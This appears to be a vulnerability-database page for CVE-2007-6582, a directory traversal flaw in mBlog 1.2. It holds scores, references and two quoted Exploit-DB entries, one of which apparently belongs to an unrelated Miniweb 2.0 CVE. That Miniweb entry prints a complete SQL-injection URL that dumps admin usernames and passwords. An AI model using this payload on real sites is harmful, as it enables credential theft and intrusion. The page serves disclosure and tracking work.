CVE-2007-6582
published 2007-12-28CVE-2007-6582: Directory traversal vulnerability in index.php in mBlog 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter in a page…
PriorityP431medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.36%
81.7th percentile
Directory traversal vulnerability in index.php in mBlog 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter in a page mode action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| c97net | mblog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Miniweb 2.0 - 'historymonth' SQL Injection
exploitdb·2008-05-05
CVE-2008-6582 Miniweb 2.0 - 'historymonth' SQL Injection
Miniweb 2.0 - 'historymonth' SQL Injection
---
############################################
# Rem0te SQL Injection Vulnerability #
# Miniweb 2.0 [ index.php ] #
############################################
[<>]Author: HaCkeR-EgY
[<>]H^0mE: www.pal-hacker.com , atsdp.com
[<>]CONTact: [email protected]
[<>]Script : Miniweb " Blog Writer "
[<>]version : 2.0
[<>]Module Price: Only $39.00
[<>]Portal Price : $ 117
[<>]DOWNL0AD Trial : www.miniweb2.com
[<>] D0RK : hmmm........ user YOUR Mind (:
[<>] ExPLO!t :
===>http://example.com/miniweb2/index.php?module=blogwriter&historyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*
[<>] live D!mO :
===> http://miniweb2.com/moduledemo/blogwriter/index.php
Exploit-DB
mBlog 1.2 - 'page' Remote File Disclosure
exploitdb·2007-12-21
CVE-2007-6582 mBlog 1.2 - 'page' Remote File Disclosure
mBlog 1.2 - 'page' Remote File Disclosure
---
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
: :
: vuln.: mBlog 1.2 Remote File Disclosure Vulnerability :
: script info and download: http://www.c97.net/dl/index.php?act=view&id=8 :
: no dork for s-kiddie [; :
: :
: author: irk4z[at]yahoo.pl :
: greets to: str0ke, wacky, wszystkich polaków ;] :
: :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# code:
./includes/tpl.php, 41-56:
...
41 // load_tpl
42 // loding a template file into a varible.
43 // use quick_tpl to display template
44 function load_tpl ($path)
45 {
46 $tpl = '';
47 global $tpl_block;
48
49 if (substr ($path, -4) == '.tpl')
50 {
51 if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F')
No writeups or analysis indexed.
http://osvdb.org/39620http://secunia.com/advisories/28242http://www.securityfocus.com/bid/26989https://exchange.xforce.ibmcloud.com/vulnerabilities/39234https://www.exploit-db.com/exploits/4766http://osvdb.org/39620http://secunia.com/advisories/28242http://www.securityfocus.com/bid/26989https://exchange.xforce.ibmcloud.com/vulnerabilities/39234https://www.exploit-db.com/exploits/4766
2007-12-28
Published